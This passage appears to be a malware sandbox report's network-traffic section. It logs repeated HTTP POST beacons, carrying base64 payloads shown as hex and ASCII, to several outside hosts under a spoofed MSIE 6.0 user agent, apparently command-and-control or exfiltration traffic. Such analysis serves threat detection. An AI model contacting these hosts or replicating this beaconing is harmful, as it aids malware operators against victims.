59 64 45 44 62 75 34 74 4e 4a 55 4a 45 7a 42 78 37 4a 6e 63 36 49 43 6d 39 64 4c 4b 50 58 79 43 4a 56 74 6c 50 6f 67 50 71 42 67 78 5a 58 33 4a 4b 36 31 48 4a 2f 6b 71 32 52 39 2b 66 37 73 5a 35 67 69 55 56 4c 4e 68 42 74 35 53 35 73 37 2f 6e 49 4e 45 47 30 61 6f 37 64 57 4a 59 61 72 71 61 6d 35 72 31 34 50 4f 48 6f 69 4a 6d 67 51 4c 74 77 62 63 4b 43 6e 76 46 74 44 53 6e 69 6f 6a 46 47 6f 64 42 75 4a 67 59 3d Data Ascii: 0UeFPU45JMyNbOiV2fC4obEH4ppONV22Yo4Rz3jtrI16oK/oaUEic94S+cDQI3CqCwSZFNGoRLJiD9aPtrApFQlAuHPfhzCRTqISzKI34klWZJv6HFeTZVtqpVfLR0RZv4strUM4YOo0bWC1lCgxzN2JQvFHDmeFdWXw9maiUr+MTZWOHH6WmtGW3guxtcUHhtyJMUNJQaKFiUA5AKmBfyhgybj7Jqs1JITUYf1XKfOmjBd3Fu/S9oNgr1235Wy/hjOZ83kIHWfr+Psx4nTKigVShfdLFqNlNB2hYJLtwABsI/mXoIZMYnTt6RefWHGmPLgZa7sG7X8yizh8eeDme5h4YKPp9XPYm3dNgTDybjc9gDHeX/cuaBsGQ5oejhm50251DmGptJ5fDKV+wiGvw2nJBawwsNPYd8oVA69xR0PC3Vs3GVt6ZDD/Hc2xagYdEDbu4tNJUJEzBx7Jnc6ICm9dLKPXyCJVtlPogPqBgxZX3JK61HJ/kq2R9+f7sZ5giUVLNhBt5S5s7/nINEG0ao7dWJYarqam5r14POHoiJmgQLtwbcKCnvFtDSniojFGodBuJgY=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=itstfzxkxoxpnauzzfcixwhstikzroxsData Raw: 57 44 6d 41 41 4d 6f 42 39 4a 4d 43 4a 47 61 52 4c 59 5a 44 4a 59 33 74 4f 53 35 36 6a 58 30 50 6e 6a 68 46 6d 43 66 38 69 37 30 69 37 76 75 46 79 6f 76 79 2b 30 6a 4f 74 2f 39 79 2b 7a 33 43 31 73 48 6d 2b 2f 70 6d 71 46 68 32 6c 4d 56 46 69 30 38 6f 47 4c 75 4c 2f 72 39 62 68 5a 79 47 6a 75 65 50 6e 4a 33 5a 77 67 6d 49 50 63 2f 63 67 65 33 52 69 41 37 72 76 6f 47 46 6c 64 2f 65 74 77 6d 74 4b 34 51 79 64 51 4e 30 41 57 76 69 71 2f 4d 52 78 73 72 66 74 48 2f 4e 47 4a 7a 61 42 45 48 71 30 59 2b 2b 6e 59 35 68 56 73 4b 63 7a 61 6e 38 2f 47 38 72 2b 6c 70 4c 72 75 6d 78 45 62 62 2b 58 47 35 51 79 47 75 56 61 68 30 2b 58 6d 4a 32 64 64 41 30 79 73 73 48 72 50 61 2f 70 71 78 30 4c 2b 70 75 64 42 71 4a 77 62 64 4a 4d 6e 70 46 33 4f 44 70 35 75 68 65 2f 50 39 6c 53 64 58 4f 48 47 52 72 79 76 74 2f 53 56 44 7a 47 34 71 52 35 58 33 64 38 54 6a 38 4a 37 7a 49 63 69 6f 64 6c 72 4f 46 4e 76 69 50 52 2f 72 6d 79 6e 44 33 49 65 34 43 68 45 50 72 33 45 66 59 46 36 74 45 68 6b 51 42 53 47 53 58 53 7a 35 4f 57 32 4a 34 4d 48 45 42 39 4c 2f 39 62 66 6f 68 79 7a 37 59 45 6c 77 70 64 59 53 75 56 45 33 34 56 6b 6c 78 6a 6b 6c 4e 5a 57 6e 73 7a 41 34 6f 57 43 44 74 72 64 6e 4a 67 71 75 32 49 42 7a 6a 64 6c 45 70 43 59 69 6e 57 72 43 4b 34 77 4c 4c 4d 61 4c 71 4a 33 69 48 46 33 41 50 74 51 73 6e 57 36 71 64 35 50 69 6e 2f 56 61 63 33 68 46 67 35 39 4d 49 5a 39 4d 54 59 58 63 78 6a 42 6b 2f 73 4c 63 52 61 76 34 4b 37 48 79 2b 73 52 67 56 2b 49 4f 63 42 44 34 78 50 32 4f 4d 41 39 35 72 6a 2f 44 68 6e 75 31 31 69 35 30 2b 67 62 54 43 73 41 71 56 6e 69 55 41 31 73 69 56 48 54 42 52 37 48 68 68 7a 43 4f 4d 4e 76 4e 43 69 42 70 39 49 42 63 41 63 37 4b 6a 75 72 39 77 69 73 32 38 31 61 44 35 70 71 37 72 78 58 4d 6f 68 50 54 73 43 52 4d 70 41 44 50 30 4d 61 33 58 51 44 67 3d Data Ascii: WDmAAMoB9JMCJGaRLYZDJY3tOS56jX0PnjhFmCf8i70i7vuFyovy+0jOt/9y+z3C1sHm+/pmqFh2lMVFi08oGLuL/r9bhZyGjuePnJ3ZwgmIPc/cge3RiA7rvoGFld/etwmtK4QydQN0AWviq/MRxsrftH/NGJzaBEHq0Y++nY5hVsKczan8/G8r+lpLrumxEbb+XG5QyGuVah0+XmJ2ddA0yssHrPa/pqx0L+pudBqJwbdJMnpF3ODp5uhe/P9lSdXOHGRryvt/SVDzG4qR5X3d8Tj8J7zIciodlrOFNviPR/rmynD3Ie4ChEPr3EfYF6tEhkQBSGSXSz5OW2J4MHEB9L/9bfohyz7YElwpdYSuVE34VklxjklNZWnszA4oWCDtrdnJgqu2IBzjdlEpCYinWrCK4wLLMaLqJ3iHF3APtQsnW6qd5Pin/Vac3hFg59MIZ9MTYXcxjBk/sLcRav4K7Hy+sRgV+IOcBD4xP2OMA95rj/Dhnu11i50+gbTCsAqVniUA1siVHTBR7HhhzCOMNvNCiBp9IBcAc7Kjur9wis281aD5pq7rxXMohPTsCRMpADP0Ma3XQDg=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 38 66 79 33 4b 58 56 59 39 5a 50 5a 50 7a 43 63 33 41 2b 51 4a 47 36 59 71 66 77 44 62 57 75 35 65 61 51 50 79 45 55 37 75 4b 44 61 6c 6b 7a 5a 37 68 77 78 58 6b 68 35 2b 43 74 31 35 41 77 52 4f 58 51 4f 6d 7a 55 6b 63 74 54 73 41 6b 6b 52 41 2b 5a 41 77 55 56 69 59 72 2b 4c 4d 5a 33 54 58 65 6b 78 4f 4b 61 77 33 54 6d 62 66 41 53 76 43 63 66 53 51 77 6e 6a 79 4d 57 6d 36 2f 61 72 64 52 4f 75 42 55 49 57 70 51 57 49 6f 34 65 30 46 47 59 54 54 51 49 7a 79 6d 56 42 34 41 43 4d 37 30 6d 4f 49 6a 37 54 78 76 33 6c 55 4f 4e 57 59 75 43 78 47 49 6f 52 62 74 74 66 51 66 55 4b 72 41 66 58 71 76 2b 68 75 76 4e 71 79 67 4f 46 38 35 46 70 51 72 53 35 79 6d 64 4f 47 49 39 37 79 43 43 48 38 62 4e 56 53 65 47 48 49 38 69 30 4c 49 49 77 61 45 39 53 69 45 34 65 39 32 67 70 39 53 32 4f 36 78 5a 48 65 6f 2f 68 34 6a 37 73 4a 67 4c 41 30 65 63 35 6e 7a 52 49 52 55 2f 35 52 62 34 41 38 30 6c 52 58 4d 39 4d 72 33 73 55 49 43 50 50 4e 4a 2f 32 4a 59 4e 50 70 4e 75 43 65 6c 73 6b 35 35 76 32 61 48 6c 34 5a 63 68 38 33 73 30 46 4a 35 58 72 6d 62 72 36 4a 31 63 55 63 50 39 76 57 34 49 65 33 5a 49 31 6b 2b 2f 69 7a 66 67 37 34 4f 44 56 68 62 4c 36 41 63 68 47 72 57 57 39 56 56 37 6d 57 72 71 63 6f 78 31 58 61 41 32 51 50 38 38 62 30 32 41 69 4d 52 2f 35 48 6c 41 2f 63 50 77 62 37 75 50 62 62 2f 4a 48 4c 69 65 78 56 79 4f 56 52 55 7a 6f 4b 76 49 70 78 6e 43 2b 34 33 53 6a 63 65 72 2f 37 6b 6c 39 71 49 4f 2f 62 6b 69 7a 64 32 39 64 54 6d 51 71 53 48 61 50 47 51 54 72 78 78 76 74 41 54 70 48 54 4e 35 6d 6f 54 4d 65 67 67 52 33 66 70 75 33 66 79 31 6f 53 46 43 46 2f 68 6c 55 72 32 57 6c 4e 69 2f 50 57 63 42 57 6f 4c 45 48 78 4c 6d 6c 41 2b 58 39 68 69 4a 55 76 65 63 4f 38 51 4d 6a 45 79 43 6a 2f 76 4b 59 42 62 4f 6a 38 31 2b 41 72 4e 70 6b 32 78 71 42 61 55 72 69 70 4a 57 43 66 4a 61 6f 52 43 6e 68 Data Ascii: 8fy3KXVY9ZPZPzCc3A+QJG6YqfwDbWu5eaQPyEU7uKDalkzZ7hwxXkh5+Ct15AwROXQOmzUkctTsAkkRA+ZAwUViYr+LMZ3TXekxOKaw3TmbfASvCcfSQwnjyMWm6/ardROuBUIWpQWIo4e0FGYTTQIzymVB4ACM70mOIj7Txv3lUONWYuCxGIoRbttfQfUKrAfXqv+huvNqygOF85FpQrS5ymdOGI97yCCH8bNVSeGHI8i0LIIwaE9SiE4e92gp9S2O6xZHeo/h4j7sJgLA0ec5nzRIRU/5Rb4A80lRXM9Mr3sUICPPNJ/2JYNPpNuCelsk55v2aHl4Zch83s0FJ5Xrmbr6J1cUcP9vW4Ie3ZI1k+/izfg74ODVhbL6AchGrWW9VV7mWrqcox1XaA2QP88b02AiMR/5HlA/cPwb7uPbb/JHLiexVyOVRUzoKvIpxnC+43Sjcer/7kl9qIO/bkizd29dTmQqSHaPGQTrxxvtATpHTN5moTMeggR3fpu3fy1oSFCF/hlUr2WlNi/PWcBWoLEHxLmlA+X9hiJUvecO8QMjEyCj/vKYBbOj81+ArNpk2xqBaUripJWCfJaoRCnh
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 41 62 4c 56 67 36 5a 46 2b 4a 50 68 52 71 67 2b 51 61 41 41 65 63 6e 4a 6a 56 57 47 6c 46 76 36 4f 6a 54 6e 51 70 6b 59 6d 31 57 68 6f 69 55 36 70 41 55 55 75 4f 61 30 6c 41 33 69 50 34 70 51 64 55 30 56 49 6f 32 76 6f 71 56 55 43 34 66 58 34 41 78 6d 44 59 56 2f 56 52 4b 53 4b 4b 4b 4c 73 45 74 53 67 6b 37 73 73 36 4d 68 76 47 70 5a 48 58 73 6e 78 78 71 30 79 75 43 51 72 33 73 46 4d 6f 61 4a 79 4a 53 73 4b 47 63 58 73 36 6a 56 4c 7a 61 76 5a 7a 2f 45 30 6d 43 74 2b 37 58 6a 39 64 77 33 6c 4d 4b 38 76 68 6b 50 34 32 55 6d 45 50 73 51 73 77 74 76 67 68 66 71 50 54 47 2f 48 6b 54 4f 55 53 57 43 45 4d 65 74 68 46 4b 72 75 61 77 4c 41 69 67 36 73 36 58 70 32 4a 34 4d 30 65 69 4f 58 39 34 37 6c 6e 42 56 45 66 4a 2b 61 5a 64 38 43 69 70 4b 33 65 4d 62 76 58 75 52 42 55 45 37 72 4f 6d 48 75 34 50 30 36 47 73 72 77 34 71 77 62 6e 46 48 7a 49 48 45 75 6e 6e 2b 47 36 72 70 6c 32 31 6c 61 6b 43 77 6d 4e 52 2f 47 45 38 7a 35 56 30 75 32 64 6a 4f 31 4e 63 42 58 66 2b 44 73 47 49 51 33 48 37 66 4c 62 33 4a 76 4b 4c 79 73 72 75 48 61 6d 43 49 6a 49 42 48 6e 56 6d 73 58 37 67 64 5a 43 68 42 62 58 53 74 48 4d 6b 35 43 6b 6c 76 36 57 58 56 2b 67 2f 43 6c 47 52 2b 43 4d 62 76 66 4a 69 4b 70 48 44 4e 66 32 6e 30 47 77 58 45 64 6a 6f 46 61 62 68 58 67 6f 55 45 5a 55 43 39 77 4d 4f 6c 46 63 79 44 51 69 38 33 54 38 69 48 4e 4b 30 32 52 57 59 33 43 6a 2b 66 42 38 4d 4c 45 73 47 62 56 67 35 55 32 55 65 55 31 54 6c 68 4c 37 30 6a 33 75 35 4f 54 66 79 31 43 4d 6e 74 34 59 65 57 68 59 77 67 47 50 5a 4f 68 38 34 4b 4b 70 76 77 53 41 35 37 68 76 6b 2f 39 67 2b 54 5a 39 53 55 55 43 4d 39 4a 2b 62 53 2f 62 59 48 5a 38 73 6c 35 72 61 41 79 42 45 52 42 67 3d 3d Data Ascii: AbLVg6ZF+JPhRqg+QaAAecnJjVWGlFv6OjTnQpkYm1WhoiU6pAUUuOa0lA3iP4pQdU0VIo2voqVUC4fX4AxmDYV/VRKSKKKLsEtSgk7ss6MhvGpZHXsnxxq0yuCQr3sFMoaJyJSsKGcXs6jVLzavZz/E0mCt+7Xj9dw3lMK8vhkP42UmEPsQswtvghfqPTG/HkTOUSWCEMethFKruawLAig6s6Xp2J4M0eiOX947lnBVEfJ+aZd8CipK3eMbvXuRBUE7rOmHu4P06Gsrw4qwbnFHzIHEunn+G6rpl21lakCwmNR/GE8z5V0u2djO1NcBXf+DsGIQ3H7fLb3JvKLysruHamCIjIBHnVmsX7gdZChBbXStHMk5Cklv6WXV+g/ClGR+CMbvfJiKpHDNf2n0GwXEdjoFabhXgoUEZUC9wMOlFcyDQi83T8iHNK02RWY3Cj+fB8MLEsGbVg5U2UeU1TlhL70j3u5OTfy1CMnt4YeWhYwgGPZOh84KKpvwSA57hvk/9g+TZ9SUUCM9J+bS/bYHZ8sl5raAyBERBg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 30 72 70 39 38 4c 78 38 38 35 50 76 46 37 63 65 5a 7a 44 62 38 55 38 54 41 61 46 55 67 50 2b 47 73 44 6c 4d 76 76 59 31 39 51 32 53 4f 47 34 32 76 6f 52 71 6b 39 64 55 37 37 41 56 50 35 71 78 47 67 55 72 56 59 69 33 48 44 64 66 49 37 6b 4a 41 2b 4f 6c 72 32 67 35 59 62 71 57 64 33 36 35 79 63 67 37 56 65 57 38 74 52 71 4c 78 35 61 38 70 78 38 4a 6e 66 32 6f 4f 73 37 64 50 4a 49 4f 5a 63 55 72 72 65 39 31 6c 34 6b 75 48 54 44 66 49 53 74 54 56 39 7a 4f 70 4f 32 6b 77 55 4e 30 71 44 54 66 52 75 35 47 43 67 4e 7a 75 54 48 45 54 6a 6e 6e 38 52 55 6b 4d 36 4b 76 32 6a 63 61 68 39 46 6f 48 48 54 30 4b 73 6f 72 30 69 70 6a 4a 6c 6a 54 53 57 57 69 31 4a 43 48 6d 6b 35 73 58 7a 54 34 74 37 41 32 38 4b 4d 4a 42 36 30 45 41 57 4e 4f 6a 31 67 34 76 6f 52 4e 59 39 36 75 74 6a 42 6b 62 4b 50 63 6a 72 43 76 62 4b 65 51 50 68 59 71 48 47 57 35 55 2b 37 41 5a 41 46 6b 70 48 31 78 54 76 45 33 46 42 6c 2b 42 55 4c 52 2b 65 2f 64 61 56 34 41 43 69 63 53 59 59 38 46 70 70 4a 68 45 7a 54 6c 67 33 2b 7a 64 52 49 4c 2f 77 32 38 6d 4f 74 48 39 64 4a 53 7a 58 2f 59 38 47 33 52 67 31 56 35 6a 37 78 4b 34 31 62 56 6c 61 4d 75 45 41 39 74 7a 6f 61 52 76 52 70 5a 46 62 78 34 6e 37 64 6f 4e 67 53 46 78 6b 32 43 34 4c 67 30 47 6a 34 65 6c 50 37 4e 44 4e 6b 5a 38 2b 4d 73 79 74 4a 77 37 68 45 76 78 68 75 77 4c 35 48 47 33 59 49 48 76 6a 78 4f 56 32 7a 6f 79 75 65 66 39 6f 74 2f 6b 51 53 2f 30 6a 78 63 59 51 46 44 51 34 65 2b 4d 6d 31 6c 50 61 57 48 53 71 7a 35 6b 50 6a 55 38 4f 4c 64 69 78 75 73 74 43 4d 47 2b 6b 4e 2b 71 42 4a 42 31 4b 6d 36 39 4f 61 79 2f 46 2f 35 50 42 6b 68 33 65 2b 4a 4c 75 53 51 6f 41 35 79 78 6f 49 7a 4d 69 4e 38 4a 32 74 34 Data Ascii: 0rp98Lx885PvF7ceZzDb8U8TAaFUgP+GsDlMvvY19Q2SOG42voRqk9dU77AVP5qxGgUrVYi3HDdfI7kJA+Olr2g5YbqWd365ycg7VeW8tRqLx5a8px8Jnf2oOs7dPJIOZcUrre91l4kuHTDfIStTV9zOpO2kwUN0qDTfRu5GCgNzuTHETjnn8RUkM6Kv2jcah9FoHHT0Ksor0ipjJljTSWWi1JCHmk5sXzT4t7A28KMJB60EAWNOj1g4voRNY96utjBkbKPcjrCvbKeQPhYqHGW5U+7AZAFkpH1xTvE3FBl+BULR+e/daV4ACicSYY8FppJhEzTlg3+zdRIL/w28mOtH9dJSzX/Y8G3Rg1V5j7xK41bVlaMuEA9tzoaRvRpZFbx4n7doNgSFxk2C4Lg0Gj4elP7NDNkZ8+MsytJw7hEvxhuwL5HG3YIHvjxOV2zoyuef9ot/kQS/0jxcYQFDQ4e+Mm1lPaWHSqz5kPjU8OLdixustCMG+kN+qBJB1Km69Oay/F/5PBkh3e+JLuSQoA5yxoIzMiN8J2t4
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 32 35 7a 66 63 7a 41 52 41 4a 53 65 59 79 38 68 51 2f 4c 34 64 4f 50 44 43 42 54 59 76 7a 4b 74 5a 50 73 31 58 6c 71 61 6a 52 46 6c 6f 63 6e 6b 34 30 77 74 37 6b 70 30 6f 4b 6b 4e 50 2f 45 73 4c 4d 61 50 51 63 33 45 46 45 77 6e 59 6d 4a 6a 62 30 32 6d 6e 2f 37 4c 54 67 38 4e 71 56 48 42 38 58 39 2b 63 48 5a 61 4e 55 69 50 55 37 68 45 54 33 5a 32 55 53 44 5a 61 30 53 2f 51 37 58 55 7a 2b 65 70 43 50 61 64 45 6b 4e 64 77 34 55 4e 52 51 69 71 65 6f 62 6d 67 73 4d 77 6d 73 35 63 35 47 49 4e 73 79 56 52 71 65 36 59 75 74 30 69 45 72 6a 44 55 68 58 7a 6d 78 70 48 56 6e 71 72 35 47 65 30 39 64 50 63 41 6b 39 31 38 30 75 73 43 58 37 6b 33 41 4c 61 70 6c 64 59 54 6c 46 4d 66 67 52 50 53 64 47 68 4e 55 56 53 49 49 71 6c 76 74 72 71 49 58 51 6e 4c 2f 63 43 73 69 69 55 66 55 55 47 6a 66 4c 33 45 41 5a 4d 56 48 35 4f 6f 75 5a 53 69 42 70 4d 42 32 74 4e 51 35 67 70 75 49 4f 75 42 6a 75 76 45 54 68 79 61 4a 69 78 54 34 51 76 64 66 34 4a 58 43 4f 39 48 36 45 65 4d 6a 55 5a 77 4b 31 32 5a 4a 31 31 64 39 50 5a 47 4d 4a 74 6a 6e 6d 36 75 53 37 38 48 79 58 6c 7a 70 4f 6d 51 38 62 6a 6f 66 36 4a 6b 63 6e 59 71 69 45 2f 6f 41 4e 56 4f 59 62 61 61 68 4d 77 65 2b 67 4d 66 43 32 41 57 62 66 69 51 46 33 4b 4b 78 6a 36 72 79 7a 6d 63 63 6d 48 33 4a 52 48 2f 44 68 6e 2f 6e 4c 47 41 43 45 48 4c 79 6d 69 2b 43 55 5a 50 79 62 2f 42 34 47 58 38 61 4b 55 4c 78 2b 61 4b 4a 67 4f 47 75 63 39 58 43 69 45 4e 55 4f 67 70 32 49 62 35 31 44 37 4a 69 48 59 4f 36 43 4a 42 2f 4e 70 78 56 31 78 6d 6a 41 62 51 33 4f 64 6b 71 53 74 6e 48 48 6a 4e 4e 6f 32 6b 38 72 6a 2b 31 57 50 52 49 62 41 76 38 47 58 39 30 37 45 78 2f 47 6e 74 48 79 53 79 6c 42 6e 66 6c 2b 58 67 34 37 68 4c 72 54 78 6e 41 6e 2b 4f 7a 43 6f 76 77 37 4f 47 53 6a 69 31 33 4b 42 7a 64 51 3d Data Ascii: 25zfczARAJSeYy8hQ/L4dOPDCBTYvzKtZPs1XlqajRFlocnk40wt7kp0oKkNP/EsLMaPQc3EFEwnYmJjb02mn/7LTg8NqVHB8X9+cHZaNUiPU7hET3Z2USDZa0S/Q7XUz+epCPadEkNdw4UNRQiqeobmgsMwms5c5GINsyVRqe6Yut0iErjDUhXzmxpHVnqr5Ge09dPcAk9180usCX7k3ALapldYTlFMfgRPSdGhNUVSIIqlvtrqIXQnL/cCsiiUfUUGjfL3EAZMVH5OouZSiBpMB2tNQ5gpuIOuBjuvEThyaJixT4Qvdf4JXCO9H6EeMjUZwK12ZJ11d9PZGMJtjnm6uS78HyXlzpOmQ8bjof6JkcnYqiE/oANVOYbaahMwe+gMfC2AWbfiQF3KKxj6ryzmccmH3JRH/Dhn/nLGACEHLymi+CUZPyb/B4GX8aKULx+aKJgOGuc9XCiENUOgp2Ib51D7JiHYO6CJB/NpxV1xmjAbQ3OdkqStnHHjNNo2k8rj+1WPRIbAv8GX907Ex/GntHySylBnfl+Xg47hLrTxnAn+OzCovw7OGSji13KBzdQ=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 71 6f 41 6b 64 62 77 62 41 4a 54 49 64 7a 6b 41 5a 30 50 5a 67 45 38 4b 65 76 70 55 47 34 35 6a 73 41 6a 72 54 38 76 78 45 34 56 30 76 46 67 43 71 65 47 65 30 47 59 46 67 6d 70 46 57 52 54 74 7a 63 7a 42 6e 73 6d 53 62 68 4c 64 38 64 65 34 66 38 2f 48 63 6d 69 50 4b 4c 6a 69 6c 58 4a 39 4f 56 58 77 2f 75 61 2b 50 4b 71 55 4d 76 41 70 31 66 42 2b 4c 4f 76 59 43 7a 4c 52 68 59 58 78 74 63 5a 6e 32 32 6a 6c 61 65 6d 6e 73 39 46 34 47 68 55 77 39 58 61 6c 6b 6d 74 35 54 70 68 46 74 49 50 48 52 37 74 34 77 47 6e 4a 36 6f 72 78 35 4b 66 50 58 68 75 43 71 36 65 35 5a 71 63 79 6a 4b 48 67 54 6f 5a 51 63 6a 45 4c 78 37 75 67 65 46 52 52 42 75 2f 43 68 6a 41 62 69 51 2b 6b 34 7a 48 57 51 65 6f 70 6d 6f 6a 62 2f 49 48 36 4f 43 46 4e 7a 59 70 4a 31 79 70 2b 51 54 78 41 45 6d 32 6d 76 56 36 59 79 57 5a 46 38 72 74 47 57 71 33 32 62 33 43 55 69 79 62 53 65 31 6a 45 32 57 66 34 4c 63 74 52 50 36 42 51 76 38 33 66 4b 79 43 6b 2b 70 55 4b 73 31 2f 36 63 64 4a 65 32 63 71 79 61 66 66 6f 41 72 58 72 50 42 4e 4b 53 6d 69 37 68 31 55 35 6f 66 74 6b 4b 6c 55 51 50 6b 66 63 63 68 6a 51 39 4e 68 4f 30 4f 75 6e 6c 79 59 65 58 67 6e 4b 2b 51 72 68 52 49 2b 79 6c 36 47 43 55 4e 35 50 65 5a 4d 57 69 4b 4b 68 6a 2b 4f 39 33 38 37 31 7a 72 4e 4f 53 45 76 42 4c 73 70 6a 45 36 5a 4d 50 59 2f 59 42 66 6f 47 72 6c 4d 71 6b 66 64 64 6e 58 6c 69 30 5a 34 55 66 32 32 70 35 37 39 42 44 2b 78 4c 37 63 4e 49 32 7a 59 75 50 70 6c 32 69 54 37 69 4a 77 67 65 4e 41 37 33 48 75 45 75 34 51 78 65 58 38 36 6a 48 62 64 71 65 5a 58 6a 30 31 68 78 70 49 74 4c 54 78 75 39 64 69 62 73 78 4f 2b 41 6d 34 75 2b 64 56 4a 4f 78 69 67 52 58 62 56 7a 4e 78 55 55 6a 4a 6e 51 75 52 77 55 4d 6f 71 71 65 64 4f 5a 4e 54 39 79 6e 50 77 4f 62 6e 49 6d 45 67 4d 64 32 32 62 76 2f 67 3d 3d Data Ascii: qoAkdbwbAJTIdzkAZ0PZgE8KevpUG45jsAjrT8vxE4V0vFgCqeGe0GYFgmpFWRTtzczBnsmSbhLd8de4f8/HcmiPKLjilXJ9OVXw/ua+PKqUMvAp1fB+LOvYCzLRhYXxtcZn22jlaemns9F4GhUw9Xalkmt5TphFtIPHR7t4wGnJ6orx5KfPXhuCq6e5ZqcyjKHgToZQcjELx7ugeFRRBu/ChjAbiQ+k4zHWQeopmojb/IH6OCFNzYpJ1yp+QTxAEm2mvV6YyWZF8rtGWq32b3CUiybSe1jE2Wf4LctRP6BQv83fKyCk+pUKs1/6cdJe2cqyaffoArXrPBNKSmi7h1U5oftkKlUQPkfcchjQ9NhO0OunlyYeXgnK+QrhRI+yl6GCUN5PeZMWiKKhj+O93871zrNOSEvBLspjE6ZMPY/YBfoGrlMqkfddnXli0Z4Uf22p579BD+xL7cNI2zYuPpl2iT7iJwgeNA73HuEu4QxeX86jHbdqeZXj01hxpItLTxu9dibsxO+Am4u+dVJOxigRXbVzNxUUjJnQuRwUMoqqedOZNT9ynPwObnImEgMd22bv/g==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 38 66 79 33 4b 58 56 59 39 5a 50 5a 50 7a 43 63 33 41 2b 51 4a 47 36 59 71 66 77 44 62 57 75 35 65 61 51 50 79 45 55 37 75 4b 44 61 6c 6b 7a 5a 37 68 77 78 58 6b 68 35 2b 43 74 31 35 41 77 52 4f 58 51 4f 6d 7a 55 6b 63 74 54 73 41 6b 6b 52 41 2b 5a 41 77 55 56 69 59 72 2b 4c 4d 5a 33 54 58 65 6b 78 4f 4b 61 77 33 54 6d 62 66 41 53 76 43 63 66 53 51 77 6e 6a 79 4d 57 6d 36 2f 61 72 64 52 4f 75 42 55 49 57 70 51 57 49 6f 34 65 30 46 47 59 54 54 51 49 7a 79 6d 56 42 34 41 43 4d 37 30 6d 4f 49 6a 37 54 78 76 33 6c 55 4f 4e 57 59 75 43 78 47 49 6f 52 62 74 74 66 51 66 55 4b 72 41 66 58 71 76 2b 68 75 76 4e 71 79 67 4f 46 38 35 46 70 51 72 53 35 79 6d 64 4f 47 49 39 37 79 43 43 48 38 62 4e 56 53 65 47 48 49 38 69 30 4c 49 49 77 61 45 39 53 69 45 34 65 39 32 67 70 39 53 32 4f 36 78 5a 48 65 6f 2f 68 34 6a 37 73 4a 67 4c 41 30 65 63 35 6e 7a 52 49 52 55 2f 35 52 62 34 41 38 30 6c 52 58 4d 39 4d 72 33 73 55 49 43 50 50 4e 4a 2f 32 4a 59 4e 50 70 4e 75 43 65 6c 73 6b 35 35 76 32 61 48 6c 34 5a 63 68 38 33 73 30 46 4a 35 58 72 6d 62 72 36 4a 31 63 55 63 50 39 76 57 34 49 65 33 5a 49 31 6b 2b 2f 69 7a 66 67 37 34 4f 44 56 68 62 4c 36 41 63 68 47 72 57 57 39 56 56 37 6d 57 72 71 63 6f 78 31 58 61 41 32 51 50 38 38 62 30 32 41 69 4d 52 2f 35 48 6c 41 2f 63 50 77 62 37 75 50 62 62 2f 4a 48 4c 69 65 78 56 79 4f 56 52 55 7a 6f 4b 76 49 70 78 6e 43 2b 34 33 53 6a 63 65 72 2f 37 6b 6c 39 71 49 4f 2f 62 6b 69 7a 64 32 39 64 54 6d 51 71 53 48 61 50 47 51 54 72 78 78 76 74 41 54 70 48 54 4e 35 6d 6f 54 4d 65 67 67 52 33 66 70 75 33 66 79 31 6f 53 46 43 46 2f 68 6c 55 72 32 57 6c 4e 69 2f 50 57 63 42 57 6f 4c 45 48 78 4c 6d 6c 41 2b 58 39 68 69 4a 55 76 65 63 4f 38 51 4d 6a 45 79 43 6a 2f 76 4b 59 42 62 4f 6a 38 31 2b 41 72 4e 70 6b 32 78 71 42 61 55 72 69 70 4a 57 43 66 4a 61 6f 52 43 6e 68 Data Ascii: 8fy3KXVY9ZPZPzCc3A+QJG6YqfwDbWu5eaQPyEU7uKDalkzZ7hwxXkh5+Ct15AwROXQOmzUkctTsAkkRA+ZAwUViYr+LMZ3TXekxOKaw3TmbfASvCcfSQwnjyMWm6/ardROuBUIWpQWIo4e0FGYTTQIzymVB4ACM70mOIj7Txv3lUONWYuCxGIoRbttfQfUKrAfXqv+huvNqygOF85FpQrS5ymdOGI97yCCH8bNVSeGHI8i0LIIwaE9SiE4e92gp9S2O6xZHeo/h4j7sJgLA0ec5nzRIRU/5Rb4A80lRXM9Mr3sUICPPNJ/2JYNPpNuCelsk55v2aHl4Zch83s0FJ5Xrmbr6J1cUcP9vW4Ie3ZI1k+/izfg74ODVhbL6AchGrWW9VV7mWrqcox1XaA2QP88b02AiMR/5HlA/cPwb7uPbb/JHLiexVyOVRUzoKvIpxnC+43Sjcer/7kl9qIO/bkizd29dTmQqSHaPGQTrxxvtATpHTN5moTMeggR3fpu3fy1oSFCF/hlUr2WlNi/PWcBWoLEHxLmlA+X9hiJUvecO8QMjEyCj/vKYBbOj81+ArNpk2xqBaUripJWCfJaoRCnh
